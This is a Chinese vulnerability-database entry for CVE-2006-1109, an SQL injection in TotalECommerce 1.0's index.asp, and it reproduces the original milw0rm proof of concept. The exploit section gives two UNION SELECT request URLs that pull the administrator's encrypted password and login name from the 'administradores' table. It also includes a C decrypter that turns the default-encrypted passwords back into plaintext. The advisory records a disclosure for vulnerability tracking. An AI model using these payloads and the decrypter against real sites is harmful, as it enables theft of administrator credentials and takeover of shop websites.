TotalECommerce 'index.asp' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109856 漏洞类型 SQL注入
发布时间 2006-03-04 更新时间 2008-06-04
CVE编号 CVE-2006-1109 CNNVD-ID CNNVD-200603-150
漏洞平台 ASP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/1550
https://www.securityfocus.com/bid/16960
https://cxsecurity.com/issue/WLB-2006030029
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200603-150
|漏洞详情
TotalEcommerce1.0的index.asp中存在SQL注入漏洞,远程攻击者可以通过id参数执行任意SQL命令。注意:尚不清楚本报告是否与一个特定产品有关。
|漏洞EXP
Original advisory: http://www.nukedx.com/?viewdoc=18
Advisory by: nukedx
Full PoC
Explotation:
GET -> http://[victim]/[dir]/index.asp?secao=[PageID]&id=[SQL]
EXAMPLE 1 -> http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha+from+administradores
EXAMPLE 2 -> http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login+from+administradores
with example 1 remote attacker can get admin's encrypted password and with example 2 remote attacker can get admin's login name
[PageID]: must be working page id you can get some from frontpage.
<--Decrypter code-->
<--Note: This decrypter just decrypts default data
If webmaster changed te_chave value in funcoes.asp
this decrypter wont decrypt data so you need to 
make your own decrypter
-->
<--C Source-->
/*********************************************
*        TotalECommerce PWD Decrypter        *
*        Coded by |SaMaN| for nukedx         *
*          http://www.k9world.org            *
*              IRC.K9World.Org               *
*Advisory: http://www.nukedx.com/?viewdoc=18 *
**********************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

int main()
{
  char buf[255];
  char buf2[255];
  char buf3[255];
  char *texto;
  char *vcrypt;   
  int i,x,z,t = 0;
  char saman;
  texto = buf;
  vcrypt = buf2;
  printf("%s", "|=------------------------------------=|\n");
  printf("%s", "   Coded by |SaMaN| @ IRC.K9World.Org\n");
  printf("%s", "|=------------------------------------=|\n\n");
  printf("%s", "Enter crypted password: ");
  scanf("%200s", buf);
  if (!texto)
  vcrypt = "";

  for (i = 0; i < strlen(texto); i++)
  {
    if ((vcrypt == "") || (i > strlen(texto)))
    x = 1;
    else 
    x = x + 1;
    t = buf[i];
    z = 255 - t;
    saman = toascii(z);
    snprintf(buf3, 250, "%c", saman);
    strncat(buf2, buf3, 250);
  }
  printf("Result: %s\n", buf2);
  return;
}
<--End of code-->
<--Thanks |SaMaN| for decrypter-->

// milw0rm.com [2006-03-04]
|受影响的产品
TotalECommerce TotalECommerce 1.0
|参考资料

来源:XF
名称:totalecommerce-index-sql-injection(25045)
链接:http://xforce.iss.net/xforce/xfdb/25045
来源:BID
名称:16960
链接:http://www.securityfocus.com/bid/16960
来源:BUGTRAQ
名称:20060304Advisory:TotalECommerce(index.aspid)RemoteSQLInjectionVulnerability.
链接:http://www.securityfocus.com/archive/1/archive/1/426765/100/0/threaded
来源:MISC
链接:http://www.nukedx.com/?viewdoc=18
来源:VUPEN
名称:ADV-2006-0840
链接:http://www.frsirt.com/english/advisories/2006/0840
来源:SECUNIA
名称:19103
链接:http://secunia.com/advisories/19103
来源:SREASON
名称:530
链接:http://securityreason.com/securityalert/530